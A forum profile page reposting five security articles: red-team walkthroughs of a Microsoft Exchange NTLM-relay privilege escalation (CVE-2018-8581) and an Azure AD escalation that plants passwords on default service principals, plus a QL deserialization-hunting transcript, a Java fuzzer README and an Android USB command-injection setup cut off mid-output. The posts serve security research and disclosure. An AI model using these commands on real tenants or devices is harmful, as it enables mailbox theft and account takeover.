Jump to content

Nytro

Administrators
  • Posts

    18664
  • Joined

  • Last visited

  • Days Won

    683

Everything posted by Nytro

  1. Microsoft Exchange – Privilege Escalation September 16, 2019 Administrator Red Team CVE-2018-8581, Microsoft Exchange, NTLM Relay, Privilege Escalation, PushSubscription Leave a comment Harvesting the credentials of a domain user during a red team operation can lead to execution of arbitrary code, persistence and domain escalation. However information that is stored over emails can be highly sensitive for an organisation and therefore threat actors focus can be to exfiltrate data from emails. This can be achieved either by adding a rule to the mailbox of a target user that will forward emails to an inbox that the attacker controls or by delegating access of a mailbox to their Exchange account. Dustin Childs from Zero Day Initiative discovered a vulnerability in Microsoft Exchange that could allow an attacker to impersonate a target account. This vulnerability exist because by design Microsoft Exchange allows any user to specify a URL for Push Subscription and Exchange will send notifications to this URL. NTLM hashes are also leaked and can be used to authenticate with Exchange Web Services via NTLM relay with the leaked NTLM hash. The technical details of the vulnerability has been covered into the Zero Day Initiative blog. Email Forwarding Accessing the compromised account from Outlook Web Access (OWA) portal and selecting the permissions of the inbox folder will open a new window that will contain the permissions of the mailbox. Inbox Permissions The target account should be added to have permissions over the mailbox. This is required in order to retrieve the SID (Security Identifier) of the account. Add Permissions for the Target Account Opening the Network console in the browser and browsing a mailbox folder will generate a request that will be sent to the Microsoft Exchange server. POST Request to Microsoft Exchange Examining the HTTP Response of the request will unveil the SID of the Administrator account. Administrator SID The implementation of this attack requires two python scripts from the Zero Day Initiative GitHub repository. The serverHTTP_relayNTLM.py script requires the SID of the Administrator that has been retrieved, the IP address of the Exchange with the target port and the email account that has been compromised and is in control of the red team. Configuration serverHTTP_relayNTLM script Once the script has the correct values it can be executed in order to start a relay server. 1 python serverHTTP_relayNTLM.py Relay Server The Exch_EWS_pushSubscribe.py requires the domain credentials and the domain of the compromised account and the IP address of the relay server. Push Subscribe Script Configuration Executing the python script will attempt to send the pushSubscribe requests to the Exchange via EWS (Exchange Web Services). 1 python Exch_EWS_pushSubscribe.py pushSubscribe python script Exchange Response XML Reponse The NTLM hash of the Administrator will be relayed back to the Microsoft Exchange server. Relay Administrator NTLM Relay Administrator NTLM to Exchange Emails tha will be sent to the mailbox of the target account (Administrator) will be forwarded automatically to the mailbox that is under the control of the red team. Email to target account The email will be forwarded at the inbox of the account that the Red Team controls. Email forwarded automatically A rule has been created to the target account by using NTLM relay to authenticate with the Exchange that will forward all the email messages to another inbox. This can be validated by checking the Inbox rules of the target account. Rule – Forward Admin Emails Delegate Access Microsoft Exchange users can connect their account (Outlook or OWA) to other mailboxes (delegate access) if they have the necessary permissions assigned. Attempting to open directly a mailbox of another account withouth permissions will produce the following error. Open Another Mailbox – No Permissions There is a python script which is exploiting the same vulnerability but instead of adding a forwarding rule is assigning permissions to the account to access any mailbox in the domain including domain administrator. The script requires valid credentials, the IP address of the Exchange server and the target email account. Script Configuration Executing the python script will attempt to perform the elevation. 1 python2 CVE-2018-8581.py Privilege Escalation Script Once the script is finished a message will appear that will inform the user that the mailbox of the target account can be displayed via Outlook or Outlook Web Access portal. Privilege Escalation Script – Delegation Complete Authentication with Outlook Web Access is needed in order to be able to view the delegated mailbox. Outlook Web Access Authentication Outlook Web Access has a functionality which allows an Exchange user to open the mailbox of another account if he has permissions. Open Another Mailbox The following Window will appear on the screen. Open Another Mailbox Window The mailbox of the Administrator will open in another tab to confirm the elevation of privileges. References https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange https://github.com/thezdi/PoC/tree/master/CVE-2018-8581 https://github.com/WyAtu/CVE-2018-8581 Sursa: https://pentestlab.blog/2019/09/16/microsoft-exchange-privilege-escalation/
  2. Finding Insecure Deserialization in Java By: Semmle Team September 12, 2019 Video Transcription Last year, one of our security researchers Mo discovered an unsafe deserialization vulnerability in Apache Struts. It turned out to allow a remote code execution and and it was also part of the default configuration for struts so this was a pretty high impact vulnerability. Today, I'm going to show you how to find unsafe deserialization vulnerabilities using QL. You can see here that I've got a copy of QL for eclipse. I have a snapshot of struts from August last year which includes the vulnerability loaded up and I'm going to walk you through the process of finding that vulnerability with QL. To start, I'm just going to look for all of the places in a code where we we potentially perform deserialization and I'm interested in calls where the thing that's being called has the name fromXML. We've got two results here and we can jump to the source code in the snapshot to see that these are both calls to fromXML. Now, this is not necessarily enough for these to be vulnerable. In addition to just doing the deserialization, the user has to be able to control the value that's being passed into from XML. This is a pretty typical type of problem. When you're doing variant analysis, you have some value that is potentially user controlled and you want to know if it reaches a dangerous operation. Semmle provides a library that will allow you to do a dataflow analysis. I've just pulled that in with these imports here and that's what I'm going to use to try and decide for each of these fromxml calls is this is this something that's really vulnerable or are they okay. The first thing I need to do is is define a data flow configuration that tells us what are the sources that the user might be able to control and what are the sinks - in this case, the arguments to fromXML. There's a little bit of boilerplate here while I set this up. Then the kind of the information I need to provide here is what are the sources, so this is how I do that. And we're going to say something is a source if it's a kind of RemoteFlowSource. This is a class that's provided by Semmle, it covers a lot of your standard ways that that an end user can control a value in a java application. This includes things like all of the web server annotations and these sorts of things that you'll be familiar with. Of course, if you want to add your own or customize that then you can you can put whatever you want in here. Now I'm going to do the same for the sinks. We said earlier that the sinks are gonna be anything that gets passed into fromXML is potentially dangerous. Say something is a sink if there is a call fromXML and one of the arguments to that call is our sink. I've written my configuration and now I can go ahead and actually use that in the query. What I'm going do here is get the flow config and the node source and a path node that is the sink. The only kind of condition I'm going to impose on these is that under the configuration that I gave, there is a flow from the source to the sink. Then I'm going to return the source and that says when the user clicks on this result, where should we send them. I'm additionally going to give the source and the sink and this tells us to kind of provide a bit of context for this result, show how data gets between these two things, and finally a message to display. I can now run that. Okay, that's finished and we've got two results here. You can see the first one is in test code so I'll skip over that and we can take a look at the second result here. This is going to be the source as you can see request as an HTTP servlet request and and the input stream and that is something that's likely to be user controlled. Up here on the right, we've got this path Explorer. This actually shows us all of the steps that we go through to get from this source to the sink which is going to be the argument to fromXML. We start with the input stream here, you can see it gets wrapped in a reader there and then it's passed into this toObject method. We move to the next stage, here we've got the parameter toObject on XStream handler and again going back we can see that handler is a is a content type handler. If you can send a request which is going to be handled by the XStream handler, then you can pass whatever data you want into this fromXML method and that will allow you to get remote code execution with an appropriately crafted request. So that shows you how to write a simple query that will find vulnerabilities like this. You can see that it's easy to modify if you have your own sources. Maybe you've got a custom web server something like that or if you want to customize the sinks as well looking for other types of deserialization it's easy to do that as well. You can tweak this even further adding things like barriers for sanitization and things like that to really customize this as much as you want and make sure it gives you great results. Sursa: https://blog.semmle.com/insecure-deserialization-java/
  3. JQF + Zest: Semantic Fuzzing for Java JQF is a feedback-directed fuzz testing platform for Java, which uses the abstraction of property-based testing. JQF is built on top of junit-quickcheck: a tool for generating random arguments for parametric Junit test methods. JQF enables better input generation using coverage-guided fuzzing algorithms such as Zest. Zest is an algorithm that biases coverage-guided fuzzing towards producing semantically valid inputs; that is, inputs that satisfy structural and semantic properties while maximizing code coverage. Zest's goal is to find deep semantic bugs that cannot be found by conventional fuzzing tools, which mostly stress error-handling logic only. By default, JQF runs Zest via the simple command: mvn jqf:fuzz. JQF is a modular framework, supporting the following pluggable fuzzing front-ends called guidances: Binary fuzzing with AFL (tutorial) Semantic fuzzing with Zest [ISSTA'19 paper] (tutorial 1) (tutorial 2) Complexity fuzzing with PerfFuzz [ISSTA'18 paper] JQF has been successful in discovering a number of bugs in widely used open-source software such as OpenJDK, Apache Maven and the Google Closure Compiler. Zest Research Paper To reference Zest in your research, we request you to cite our ISSTA'19 paper: Rohan Padhye, Caroline Lemieux, Koushik Sen, Mike Papadakis, and Yves Le Traon. 2019. Semantic Fuzzing with Zest. In Proceedings of the 28th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA’19), July 15–19, 2019, Beijing, China. ACM, New York, NY, USA, 12 pages. https://doi.org/10.1145/3293882.3330576 JQF Tool Paper If you are using the JQF framework to build new fuzzers, we request you to cite our ISSTA'19 tool paper as follows: Rohan Padhye, Caroline Lemieux, and Koushik Sen. 2019. JQF: Coverage-Guided Property-Based Testing in Java. In Proceedings of the 28th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA ’19), July 15–19, 2019, Beijing, China. ACM, New York, NY, USA, 4 pages. https://doi.org/10.1145/3293882.3339002 Overview What is structured fuzzing? Binary fuzzing tools like AFL and libFuzzer treat the input as a sequence of bytes. If the test program expects highly structured inputs, such as XML documents or JavaScript programs, then mutating byte-arrays often results in syntactically invalid inputs; the core of the test program remains untested. Structured fuzzing tools leverage domain-specific knowledge of the input format to produce inputs that are syntactically valid by construction. Here is a nice article on structure-aware fuzzing of C++ programs using libFuzzer. What is generator-based fuzzing (QuickCheck)? Structured fuzzing tools need a way to understand the input structure. Some other tools use declarative specifications of the input format such as context-free grammars or protocol buffers. JQF uses QuickCheck's imperative approach for specifying the space of inputs: arbitrary generator programs whose job is to generate a single random input. A Generator<T> provides a method for producing random instances of type T. For example, a generator for type Calendar returns randomly-generated Calendar objects. One can easily write generators for more complex types, such as XML documents, JavaScript programs, JVM class files, SQL queries, HTTP requests, and many more -- this is generator-based fuzzing. However, simply sampling random inputs of type T is not usually very effective, since the generator does not know if the inputs that it produces are any good. What is semantic fuzzing (Zest)? JQF supports the Zest algorithm, which uses code-coverage and input-validity feedback to bias a QuickCheck-style generator towards generating structured inputs that can reveal deep semantic bugs. JQF extracts code coverage using bytecode instrumentation, and input validity using JUnit's Assume API. An input is valid if no assumptions are violated. Documentation Tutorials Zest 101: A basic tutorial for fuzzing a standalone toy program using command-line scripts. Walks through the process of writing a test driver and structured input generator for Calendar objects. Fuzzing a compiler with Zest: A tutorial for fuzzing a non-trivial program -- the Google Closure Compiler -- using a generator for JavaScript programs. This tutorial makes use of the JQF Maven plugin. Fuzzing with AFL: A tutorial for fuzzing a Java program that parses binary data, such as PNG image files, using the AFL binary fuzzing engine. Fuzzing with ZestCLI: A tutorial of fuzzing a Java program with ZestCLI Continuous Fuzzing Just like unit-tests fuzzing is advised to be run continuously with your CI as your code grows and developed. Currently there is 1 service that offer continuous fuzzing as a service based on JQF/Zest: fuzzit.dev (tutorial) Additional Details The JQF wiki contains lots more documentation including: Using a custom fuzz guidance Performance Benchmarks JQF also publishes its API docs. Contact the developers We want your feedback! (haha, get it? get it?) If you've found a bug in JQF or are having trouble getting JQF to work, please open an issue on the issue tracker. You can also use this platform to post feature requests. If it's some sort of fuzzing emergency you can always send an email to the main developer: Rohan Padhye. Trophies If you find bugs with JQF and you comfortable with sharing, We would be happy to add them to this list. Please send a PR for README.md with a link to the bug/cve you found. google/closure-compiler#2842: IllegalStateException in VarCheck: Unexpected variable google/closure-compiler#2843: NullPointerException when using Arrow Functions in dead code google/closure-compiler#3173: Algorithmic complexity / performance issue on fuzzed input google/closure-compiler#3220: ExpressionDecomposer throws IllegalStateException: Object method calls can not be decomposed JDK-8190332: PngReader throws NegativeArraySizeException when width is too large JDK-8190511: PngReader throws OutOfMemoryError for very small malformed PNGs JDK-8190512: PngReader throws undocumented IllegalArgumentException: "Empty Region" instead of IOException for malformed images with negative dimensions JDK-8190997: PngReader throws NullPointerException when PLTE section is missing JDK-8191023: PngReader throws NegativeArraySizeException in parse_tEXt_chunk when keyword length exceeeds chunk size JDK-8191076: PngReader throws NegativeArraySizeException in parse_zTXt_chunk when keyword length exceeds chunk size JDK-8191109: PngReader throws NegativeArraySizeException in parse_iCCP_chunk when keyword length exceeds chunk size JDK-8191174: PngReader throws undocumented llegalArgumentException with message "Pixel stride times width must be <= scanline stride" JDK-8191073: JpegImageReader throws IndexOutOfBoundsException when reading malformed header JDK-8193444: SimpleDateFormat throws ArrayIndexOutOfBoundsException when format contains long sequences of unicode characters JDK-8193877: DateTimeFormatterBuilder throws ClassCastException when using padding mozilla/rhino#405: FAILED ASSERTION due to malformed destructuring syntax mozilla/rhino#406: ClassCastException when compiling malformed destructuring expression mozilla/rhino#407: java.lang.VerifyError in bytecode produced by CodeGen mozilla/rhino#409: ArrayIndexOutOfBoundsException when parsing '<!-' mozilla/rhino#410: NullPointerException in BodyCodeGen COLLECTIONS-714: PatriciaTrie ignores trailing null characters in keys COMPRESS-424: BZip2CompressorInputStream throws ArrayIndexOutOfBoundsException(s) when decompressing malformed input LANG-1385: StringIndexOutOfBoundsException in NumberUtils.createNumber CVE-2018-11771: Infinite Loop in Commons-Compress ZipArchiveInputStream (found by Tobias Ospelt) MNG-6375 / plexus-utils#34: NullPointerException when pom.xml has incomplete XML tag MNG-6374 / plexus-utils#35: ModelBuilder hangs with malformed pom.xml MNG-6577 / plexus-utils#57: Uncaught IllegalArgumentException when parsing unicode entity ref Bug 62655: Augment task: IllegalStateException when "id" attribute is missing BCEL-303: AssertionViolatedException in Pass 3A Verification of invoke instructions BCEL-307: ClassFormatException thrown in Pass 3A verification BCEL-308: NullPointerException in Verifier Pass 3A BCEL-309: NegativeArraySizeException when Code attribute length is negative BCEL-310: ArrayIndexOutOfBounds in Verifier Pass 3A BCEL-311: ClassCastException in Verifier Pass 2 BCEL-312: AssertionViolation: INTERNAL ERROR Please adapt StringRepresentation to deal with ConstantPackage in Verifier Pass 2 BCEL-313: ClassFormatException: Invalid signature: Ljava/lang/String)V in Verifier Pass 3A CVE-2018-8036: Infinite Loop leading to OOM in PDFBox's AFMParser (found by Tobias Ospelt) PDFBOX-4333: ClassCastException when loading PDF (found by Robin Schimpf) PDFBOX-4338: ArrayIndexOutOfBoundsException in COSParser (found by Robin Schimpf) PDFBOX-4339: NullPointerException in COSParser (found by Robin Schimpf) CVE-2018-8017: Infinite Loop in IptcAnpaParser CVE-2018-12418: Infinite Loop in junrar (found by Tobias Ospelt) Sursa: https://github.com/rohanpadhye/jqf
  4. Azure AD privilege escalation - Taking over default application permissions as Application Admin 5 minute read During both my DEF CON and Troopers talks I mentioned a vulnerability that existed in Azure AD where an Application Admin or a compromised On-Premise Sync Account could escalate privileges by assigning credentials to applications. When revisiting this topic I found out the vulnerability was actually not fixed by Microsoft, and that there are still methods to escalate privileges using default Office 365 applications. In this blog I explain the why and how. The escalation is still possible since this behaviour is considered to be “by-design” and thus remains a risk. Applications and Service Principals In Azure AD there is a distinction between Applications and Service Principals. An application is the configuration of an application, whereas the Service Principal is the security object that can actually have privileges in the Azure Directory. This can be quite confusing as in the documentation they are usually both called applications. The Azure portal makes it even more confusing by calling Service Principals “Enterprise Applications” and hiding most properties of the service principals from view. For Office 365 and other Microsoft applications, the Application definition is present in one of Microsoft’s dedicated Azure directories. In an Office 365 tenant, service principals are created for these applications automatically, giving an Office 365 Azure AD about 200 service principals by default that all have different pre-assigned permissions. Application roles The way Azure AD applications work is that they can define roles, which can then be assigned to users, groups or service principals. If you read the documentation for the Microsoft Graph permissions you can see permissions such as Directory.Read.All. These are actually roles defined in the Microsoft Graph application, which can be assigned to service principals. In the documentation and Azure Portal, these roles are called “Application permissions”, but we’re sticking to the API terminology here. The roles defined in the Microsoft graph application can be queried using the AzureAD PowerShell module: When we try to query for applications that have been assigned one or more roles, we can see that in my test directory the appadmintest app has a few roles assigned (though it’s not exactly clear what roles that are since there’s a lot of GUID references): There is however no way to query within an Azure AD which roles have been assigned to default Microsoft applications. So to enumerate this we have to get a bit creative. An Application Administrator (or the On-premise Sync account if you are escalating from on-premise to the cloud) can assign credentials to an application, after which this application can log in using the client credential grant OAuth2 flow. Assigning credentials is possible using PowerShell: PS C:\> $sp = Get-AzureADServicePrincipal -searchstring "Microsoft StaffHub" PS C:\> New-AzureADServicePrincipalPasswordCredential -objectid $sp.ObjectId -EndDate "31-12-2099 12:00:00" -StartDate "6-8-2018 13:37:00" -Value redactedpassword CustomKeyIdentifier : EndDate : 31-12-2099 12:00:00 KeyId : StartDate : 6-8-2018 13:37:00 Value : redactedpassword After which we can log in using some python code and have a look at the issued access token. This JWT displays the roles the application has in the Microsoft Graph: import requests import json import jwt import pprint # This should include the tenant name/id AUTHORITY_URL = 'https://login.microsoftonline.com/ericsengines.onmicrosoft.com' TOKEN_ENDPOINT = '/oauth2/token' data = {'client_id':'aa580612-c342-4ace-9055-8edee43ccb89', 'resource':'https://graph.microsoft.com', 'client_secret':'redactedpassword', 'grant_type':'client_credentials'} r = requests.post(AUTHORITY_URL + TOKEN_ENDPOINT, data=data) data2 = r.json() try: jwtdata = jwt.decode(data2['access_token'], verify=False) pprint.pprint(jwtdata) except KeyError: pass This will print the data from the token, containing the “Roles” field: { "aio": "42FgYJg946pl8aLnJXPOnn4zTe/mBwA=", "app_displayname": "Microsoft StaffHub", "appid": "aa580612-c342-4ace-9055-8edee43ccb89", "appidacr": "1", "aud": "https://graph.microsoft.com", "exp": 1567200473, "iat": 1567171373, "idp": "https://sts.windows.net/50ad18e1-bb23-4466-9154-bc92e7fe3fbb/", "iss": "https://sts.windows.net/50ad18e1-bb23-4466-9154-bc92e7fe3fbb/", "nbf": 1567171373, "oid": "56748bde-f24d-4a5b-aa2d-c88b175dfc80", "roles": ["Directory.ReadWrite.All", "Mail.Read", "Group.Read.All", "Files.Read.All", "Group.ReadWrite.All"], "sub": "56748bde-f24d-4a5b-aa2d-c88b175dfc80", "tid": "50ad18e1-bb23-4466-9154-bc92e7fe3fbb", "uti": "2GScBJopwk2e3EFce7pgAA", "ver": "1.0", "xms_tcdt": 1559139940 } This method only seemed to work for the Microsoft Graph (and not for the Azure AD graph). I am unsure if this is because no apps have permissions on the Azure AD graph or if the system used for these permissions is different. If we perform this action for all ~200 default apps in an Office 365 tenant, we get an overview of all the permissions these applications have. Below is an overview of the most interesting permissions that I’ve identified. Application name AppId Access Microsoft Forms c9a559d2-7aab-4f13-a6ed-e7e9c52aec87 Sites.ReadWrite.All Microsoft Forms c9a559d2-7aab-4f13-a6ed-e7e9c52aec87 Files.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af Sites.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af Sites.FullControl.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af Files.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af Group.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af User.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af IdentityRiskyUser.ReadWrite.All Microsoft Teams 1fec8e78-bce4-4aaf-ab1b-5451cc387264 Sites.ReadWrite.All Microsoft StaffHub aa580612-c342-4ace-9055-8edee43ccb89 Directory.ReadWrite.All Microsoft StaffHub aa580612-c342-4ace-9055-8edee43ccb89 Group.ReadWrite.All Microsoft.Azure.SyncFabric 00000014-0000-0000-c000-000000000000 Group.ReadWrite.All Microsoft Teams Services cc15fd57-2c6c-4117-a88c-83b1d56b4bbe Sites.ReadWrite.All Microsoft Teams Services cc15fd57-2c6c-4117-a88c-83b1d56b4bbe Group.ReadWrite.All Office 365 Exchange Online 00000002-0000-0ff1-ce00-000000000000 Group.ReadWrite.All Microsoft Office 365 Portal 00000006-0000-0ff1-ce00-000000000000 User.ReadWrite.All Microsoft Office 365 Portal 00000006-0000-0ff1-ce00-000000000000 AuditLog.Read.All Azure AD Identity Governance Insights 58c746b0-a0b0-4647-a8f6-12dde5981638 AuditLog.Read.All Kaizala Sync Service d82073ec-4d7c-4851-9c5d-5d97a911d71d Group.ReadWrite.All So the TL;DR is that if you compromise an Application Administrator account or the on-premise Sync Account you can read and modify directory settings, group memberships, user accounts, SharePoint sites and OneDrive files. This is done by assigning credentials to an existing service principal with these permissions and then impersonating these applications. You can exploit this by assigning a password or certificate to a service principal and then logging in as that service principal. I use Python for logging in with a service principal password since the PowerShell module doesn’t support this (it does support certificates but that’s more complex to set up). The below command shows that when logging in with such a certificate, we do have the power to modify group memberships (something the application admin normally doesn’t have): PS C:\> add-azureadgroupmember -RefObjectId 2730f622-db95-4b40-9be7-6d72b6c1dad4 -ObjectId 3cf7196f-9d57-48ee-8912-dbf50803a4d8 PS C:\> Get-AzureADGroupMember -ObjectId 3cf7196f-9d57-48ee-8912-dbf50803a4d8 ObjectId DisplayName UserPrincipalName UserType -------- ----------- ----------------- -------- 2730f622-db95-4b40-9be7-6d72b6c1dad4 Mark mark@bobswrenches.onmicrosoft.com Member In the Azure AD audit log, the actions are shown as performed by “Microsoft StaffHub”, and thus nothing in the log indicates these actions were actually performed by the application administrator. Thoughts and disclosure process I don’t really see why credentials can be assigned to default service principals this way and what a possible legitimate purpose would be of this. In my opinion, it shouldn’t be possible to assign credentials to first-party Microsoft applications. The Azure portal doesn’t offer this option and does not display these “backdoor” service principals credentials, but the API’s such as the Microsoft Graph and Azure AD Graph have no such limitations. When I reported the fact that a privilege escalation is still possible this way (even after I was told it was fixed last year) I got a reply back from MSRC stating that Application Administrators assigning credentials to applications and obtaining more rights is documented and thus not a vulnerability. If you are administering an Azure AD environment I recommend implementing checks for credentials being assigned to default service principals and to regularly review who control the credentials of applications with high privileges. Updated: September 16, 2019 Sursa: https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/
  5. Command Injection with USB Peripherals by Danny Rosseau | Aug 22, 2019 | Danny Rosseau, Feature, News | 0 comments When this Project Zero report came out I started thinking more about USB as an interesting attack surface for IoT devices. Many of these devices allow users to plug in a USB and then perform some actions with that USB automatically, and that automatic functionality may be too trusting of the USB device. That post got filed away in my mind and mostly forgotten for a while until an IoT device with a USB port showed up at my door sporting a USB port. Sadly, I hadn’t yet gotten the mentioned Raspberry Pi Zero and shipping would probably take longer than my attention span would allow, but a coworker mentioned that Android has ConfigFS support so I decided to investigate that route instead, but let’s back up a bit and set the scene. I had discovered that the IoT device in question would automatically mount any USB mass storage device that was connected to it, and, if certain properties on the device were set, would use those properties — unsanitized — to create the mount directory name. Furthermore, this mounting would happen via a call to C’s infamous system function: a malicious USB device could potentially set these parameters in such a way as to get arbitrary command execution. Since the responsible daemon was running as root, this meant that I might be able to plug a USB in, wait a couple seconds, and then have command execution as root on the device. This naturally triggered my memories of all of those spy movies where the protagonist plugs something into a door’s highly sophisticated lock, which makes a bunch of numbers flash on the LED screen, magically opens the door, and makes them succinctly claim: “I’m in” in a cool tone. I wanted to do that. I was fairly certain my attack would work, but I wasn’t very familiar with turning my Android device into a custom USB peripheral and searches were mostly lacking a solution. This post is intended to supplement those lacking internet searches. If you want to follow along at home, I’m using a rooted Nexus 5X device running the last Android version it supports: 8.1. I’m not sure how different things are in Android 9 land. Android as a Mass Storage Device For my purposes, I need my Android device to show up as a USB mass storage device with the following properties controlled by me: the product name string, the product model string, and the disk label. You can customize much more than that, but I don’t care about the rest. We’ll start with what didn’t seem to work for me: I had a passing familiarity with ConfigFS and saw a /config/usb_gadget, so I figured I’d just use that to make a quick mass storage USB device using the ConfigFS method that I knew about. I wrote up a quick script to create all of the entries, but upon testing it I ran in to this: mkdir: '/config/usb_gadget/g1/functions/mass_storage.0': Function not implemented I’m still not sure why that route didn’t work, but apparently this method just isn’t supported. I was stumped for a bit and started digging into the Android and Linux kernel source code before taking a step back. I didn’t want to fall into the rabbit hole that was reading obscure kernel code: I just wanted to /bin/touch /tmp/haxxed on this device and declare myself 1337. So I left kernel land for Android init land to see what the Android devs do to change USB functionality. Taking a look at some Android init files here, you’ll notice that there are two different .rc files for USB: init.usb.configfs.rc and init.usb.rc. Keen observers (see: people who actually clicked those links) will see that each one has a check for the property sys.usb.configfs: if it is 1 the entries in the init.usb.configfs.rc file are used, otherwise the init.usb.rc entries are used. For me, sys.usb.configfs was 0 and I confirmed that things were being modified over in the /sys/class/android_usb directory, so I shifted my focus there. I haven’t gone back to investigate what would happen with sys.usb.configfs set to 1, so I’m not going to claim this is the only way to do this, but it is the way that worked for me. Exploring Unknown Lands Now that I’ve shifted my focus to the /sys/class/android_usb/android0 directory, let’s explore that. I see the following: bullhead:/sys/class/android_usb/android0 # ls bDeviceClass f_acm f_ffs f_rmnet iManufacturer power bDeviceProtocol f_audio f_gps f_rmnet_smd iProduct remote_wakeup bDeviceSubClass f_audio_source f_mass_storage f_rndis iSerial state bcdDevice f_ccid f_midi f_rndis_qc idProduct subsystem down_pm_qos_sample_sec f_charging f_mtp f_serial idVendor uevent down_pm_qos_threshold f_diag f_ncm f_uasp idle_pc_rpm_no_int_secs up_pm_qos_sample_sec enable f_ecm f_ptp f_usb_mbim pm_qos up_pm_qos_threshold f_accessory f_ecm_qc f_qdss functions pm_qos_state idVendor, idProduct, and iProduct, iManufacturer, and f_mass_storage look slightly familiar. If you are familiar with ConfigFS, the contents of f_mass_storage also looks similar to the contents of the mass_storage function: bullhead:/sys/class/android_usb/android0 # ls f_mass_storage device inquiry_string lun luns power subsystem uevent bullhead:/sys/class/android_usb/android0 # ls f_mass_storage/lun file nofua power ro uevent It is at this point that, if I were a less honest person, I’d tell you I know what is going on here. I don’t. My goal is just to hack the thing by making a malicious USB device, not learn the inner workings of the Linux kernel and how Android sets itself up as a USB peripheral. I intend to go deeper into this later, and will perhaps write a more comprehensive blog post at that point. There are plenty of hints around the source code and on the device itself that help figure out how to use this directory. One thing I see happening in init.usb.rc all the time is this line: write /sys/class/android_usb/android0/enable 0 .... write /sys/class/android_usb/android0/functions ${sys.usb.config} write /sys/class/android_usb/android0/enable 1 So what is function set to when I just have a developer device plugged in and am using ADB? bullhead:/sys/class/android_usb/android0 # cat functions ffs I happen to know that ADB on the device is implemented using FunctionFS, and ffs looks like shorthand for FunctionFS to me, so it makes sense that that would be enabled. I’m probably going to have to change that value, so let’s go ahead and set it to mass_storage and see what happens. bullhead:/sys/class/android_usb/android0 # echo 0 > enable And my ADB session dies. Right, you can’t just kill USB and expect to use a USB connection. Well, at least I know it works! Luckily ADB is nice enough to also work over TCP/IP, so I can restart and: adb tcpip 5555 adb connect 192.168.1.18:5555 For the record, I wouldn’t go doing that on your local coffee shop WiFi. OK, now that we’re connected — using the magic of photons — we can bring down USB and change to mass storage and see what happens. bullhead:/sys/class/android_usb/android0 # echo 0 > enable bullhead:/sys/class/android_usb/android0 # echo mass_storage > functions bullhead:/sys/class/android_usb/android0 # echo 1 > enable Cool, no errors or crashes or anything. If you’re familiar with ConfigFS you’ll probably also know that I can modify f_mass_storage/lun/file to give some backing storage for the mass storage device. If you’re not familiar with ConfigFS, you know that now: nice! If you already know how to make an image to back your USB mass storage device, you’re smarter than I was about a week ago and can probably skip the next section. Making Images One thing to keep in mind when making the image is that I need to be able to control the disk LABEL value (as seen by blkid). We’ll make a file and just use that instead of doing anything fancy. Note that I didn’t actually care about writing things to the USB’s disk: I just wanted it to be recognized by the target device as a mass storage device so that it would be mounted. To make our backing image file then, we’ll start off with a whole lot of nothing: dd if=/dev/zero of=backing.img count=50 bs=1M This will create a 50MB file named backing.img that is all 0s. That is pretty useless; we’re going to need to format it with fdisk. A more adept Linux hacker would probably know how to script this, but I, being an intellectual, did it this way: echo -e -n 'o\nn\n\n\n\n\nt\nc\nw\n' | fdisk backing.img That magic is filling out the fdisk entries for you. It looks like this: Welcome to fdisk (util-linux 2.31.1). Changes will remain in memory only, until you decide to write them. Be careful before using the write command. Device does not contain a recognized partition table. Created a new DOS disklabel with disk identifier 0xd643eccd. Command (m for help): Created a new DOS disklabel with disk identifier 0x50270950. Command (m for help): Partition type p primary (0 primary, 0 extended, 4 free) e extended (container for logical partitions) Select (default p): Using default response p. Partition number (1-4, default 1): First sector (2048-20479, default 2048): Last sector, +sectors or +size{K,M,G,T,P} (2048-20479, default 20479): Created a new partition 1 of type 'Linux' and of size 9 MiB. Command (m for help): Selected partition 1 Hex code (type L to list all codes): Changed type of partition 'Linux' to 'W95 FAT32 (LBA)'. Command (m for help): The partition table has been altered. Syncing disks. We’re making an image with a DOS partition table and a single FAT32 partition with everything else being the default. Cool. We need to do some formatting and labelling now: # losetup --offset 1048576 -f backing.img /dev/loop0 # mkdosfs -n "HAX" /dev/loop0 # losetup -d /dev/loop0 The magic 1048576 is 2048 * 512, which is the first sector times the sector size. Here we just attach our image as the /dev/loop0 device and run a simple mkdosfs: the -n "HAX" is important in my case as that gives me control over the LABEL. That’s all you need to do. Easy. Bringing it all Together Armed with our image we can now make the full USB device: $ adb tcpip 5555 $ adb connect 192.168.1.18:5555 $ adb push backing.img /dev/local/tmp/ $ adb shell And in the adb shell: $ su # echo 0 > /sys/class/android_usb/android0/enable # echo '/data/local/tmp/backing.img' > /sys/class/android_usb/android0/f_mass_storage/lun/file # echo 'mass_storage' > /sys/class/android_usb/android0/functions # echo 1 > /sys/class/android_usb/android0/enable If all goes well: # lsusb -v -d 18d1: Bus 003 Device 036: ID 18d1:4ee7 Google Inc. Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x18d1 Google Inc. idProduct 0x4ee7 bcdDevice 3.10 iManufacturer 1 LGE iProduct 2 Nexus 5X iSerial 3 0000000000000000 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 32 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0x80 (Bus Powered) MaxPower 500mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 2 bInterfaceClass 8 Mass Storage bInterfaceSubClass 6 SCSI bInterfaceProtocol 80 Bulk-Only iInterface 5 Mass Storage Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x01 EP 1 OUT bmAttributes 2 Transfer Type Bulk Synch 